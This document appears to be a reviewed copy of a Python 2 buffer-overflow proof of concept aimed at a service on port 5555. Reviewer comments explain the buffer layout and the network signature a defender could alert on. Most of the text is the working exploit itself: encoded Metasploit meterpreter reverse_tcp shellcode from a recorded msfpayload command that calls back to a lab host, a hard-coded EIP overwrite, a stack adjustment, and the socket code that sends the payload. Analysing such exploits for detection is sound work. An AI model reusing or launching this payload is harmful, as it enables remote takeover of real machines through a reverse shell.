# Python 2 proof-of-concept as posted (print statements, str-typed byte buffers).
# The payload bytes below are pasted verbatim from the msfpayload/msfencode command
# recorded in the comment; nothing here is regenerated or adjusted in this review.
- import socket
- #msfpayload windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.182.149 R |msfencode -e x86/alpha_mixed -b "\x40" -t ruby
- #x86/alpha_mixed succeeded with size 641 (iteration=1)
- #554 bytes exactly = chunk1
- shell = ("\x89\xe0\xd9\xc5\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x49"
- "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a"
- "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
- "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
- "\x75\x4a\x49\x69\x6c\x6b\x58\x6d\x59\x45\x50\x73\x30\x33"
- "\x30\x53\x50\x6c\x49\x49\x75\x35\x61\x78\x52\x72\x44\x4c"
- "\x4b\x36\x32\x50\x30\x6c\x4b\x32\x72\x76\x6c\x6c\x4b\x43"
- "\x62\x75\x44\x6c\x4b\x73\x42\x34\x68\x64\x4f\x4f\x47\x50"
- "\x4a\x45\x76\x75\x61\x39\x6f\x64\x71\x59\x50\x4c\x6c\x55"
- "\x6c\x31\x71\x43\x4c\x73\x32\x76\x4c\x57\x50\x6a\x61\x38"
- "\x4f\x44\x4d\x56\x61\x79\x57\x4a\x42\x38\x70\x62\x72\x70"
- "\x57\x6e\x6b\x73\x62\x54\x50\x4e\x6b\x33\x72\x37\x4c\x76"
- "\x61\x6e\x30\x6e\x6b\x63\x70\x51\x68\x6b\x35\x39\x50\x54"
- "\x34\x42\x6a\x76\x61\x4e\x30\x36\x30\x6c\x4b\x51\x58\x77"
- "\x68\x6c\x4b\x71\x48\x65\x70\x57\x71\x6b\x63\x59\x73\x57"
- "\x4c\x73\x79\x4c\x4b\x35\x64\x4c\x4b\x33\x31\x78\x56\x70"
- "\x31\x39\x6f\x74\x71\x79\x50\x6c\x6c\x59\x51\x4a\x6f\x56"
- "\x6d\x66\x61\x6a\x67\x34\x78\x4d\x30\x72\x55\x4c\x34\x43"
- "\x33\x61\x6d\x6b\x48\x75\x6b\x51\x6d\x75\x74\x43\x45\x38"
- "\x62\x76\x38\x4c\x4b\x30\x58\x66\x44\x55\x51\x6a\x73\x30"
- "\x66\x6c\x4b\x74\x4c\x50\x4b\x6e\x6b\x43\x68\x57\x6c\x37"
- "\x71\x39\x43\x4e\x6b\x34\x44\x6e\x6b\x67\x71\x38\x50\x6e"
- "\x69\x51\x54\x56\x44\x61\x34\x31\x4b\x61\x4b\x55\x31\x63"
- "\x69\x30\x5a\x32\x71\x69\x6f\x69\x70\x31\x48\x31\x4f\x52"
- "\x7a\x6c\x4b\x62\x32\x7a\x4b\x6b\x36\x63\x6d\x61\x78\x66"
- "\x53\x44\x72\x35\x50\x57\x70\x71\x78\x62\x57\x30\x73\x66"
- "\x52\x43\x6f\x71\x44\x50\x68\x50\x4c\x73\x47\x77\x56\x65"
- "\x57\x79\x6f\x69\x45\x4d\x68\x7a\x30\x53\x31\x65\x50\x63"
- "\x30\x74\x69\x6f\x34\x62\x74\x66\x30\x35\x38\x71\x39\x6d"
- "\x50\x70\x6b\x65\x50\x49\x6f\x4a\x75\x62\x70\x62\x70\x46"
- "\x30\x72\x70\x51\x50\x56\x30\x31\x50\x36\x30\x65\x38\x6a"
- "\x4a\x36\x6f\x6b\x6f\x69\x70\x6b\x4f\x4b\x65\x4e\x77\x33"
- "\x5a\x56\x65\x75\x38\x49\x50\x6f\x58\x68\x36\x6e\x75\x52"
- "\x48\x77\x72\x73\x30\x56\x71\x51\x4c\x4d\x59\x48\x66\x63"
- "\x5a\x46\x70\x61\x46\x51\x47\x71\x78\x4c\x59\x49\x35\x73"
- "\x44\x35\x31\x4b\x4f\x6a\x75\x4d\x55\x4b\x70\x30\x74\x76"
- "\x6c\x59\x6f\x72\x6e\x76\x68\x72\x55\x7a\x4c\x61\x78\x78"
- "\x70\x68\x35\x4c\x62\x52\x76\x4b\x4f\x4b\x65\x52\x4a\x53"
- "\x30\x51\x7a\x33\x34\x76\x36\x51\x47\x50\x68\x56\x62\x79"
- "\x49\x4b\x78\x63\x6f\x49\x6f\x6a\x75\x4e\x6b\x66\x56\x32"
- "\x4a\x73\x70\x32\x48\x33\x30\x44\x50\x55\x50\x55\x50\x51"
- "\x46\x50\x6a\x75\x50\x61\x78\x72\x78\x39\x34\x63\x63\x6d"
- "\x35\x39\x6f\x49\x45\x4f\x63\x50\x53\x63\x5a\x37\x70\x46"
- "\x36\x33\x63\x50\x57\x53\x58\x33\x32\x49\x49\x78\x48\x31"
- "\x4f\x49\x6f\x4e\x35\x66\x61\x68\x43\x56\x49\x4f\x36\x4f"
- "\x75\x6c\x36\x63\x45\x4a\x4c\x58\x43\x41\x41")
# The encoded payload is split at byte 554 and the two halves are placed in the
# buffer in reverse order (chunk2 first, chunk1 near the end).
- shell_chunk1 = shell[:554]
- shell_chunk2 = shell[554:]
# Target-specific constants taken from the original post; left as-is.
- #0x775e3422
- eip = "\x22\x34\x5e\x77"
- adjust = "\x81\xc4\x24\xfa\xff\xff"
# `fill` pads chunk2 to 1024 bytes; `junk` pads the whole buffer to exactly 10000 bytes
# (every component length is subtracted from 10000), so len(buff) == 10000.
- fill = "A" * (1024 - len(shell_chunk2))
- junk = "D" * (10000 - len(shell_chunk2) - len(fill) - len(eip) - len(adjust) - len(shell_chunk1))
- buff = shell_chunk2 + fill + eip + adjust + shell_chunk1 + junk
- print "chunk 1 is " + str(len(shell_chunk1))
- print "\nchunk 2 is " + str(len(shell_chunk2))
# What is observable on the wire (detection context): one TCP connection to the
# hard-coded lab address 192.168.182.128:5555 carrying a single '@F506 ' command whose
# argument is a 10000-byte blob, terminated by '@\r\npwnag3\r\n\r\n'. An oversized
# argument to this command is the signature to alert on; the socket is closed
# without reading any response, so no reply is expected or checked.
- s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
- connect=s.connect(('192.168.182.128',5555))
- s.send('@F506 '+buff+'@\r\npwnag3\r\n\r\n')
- s.close()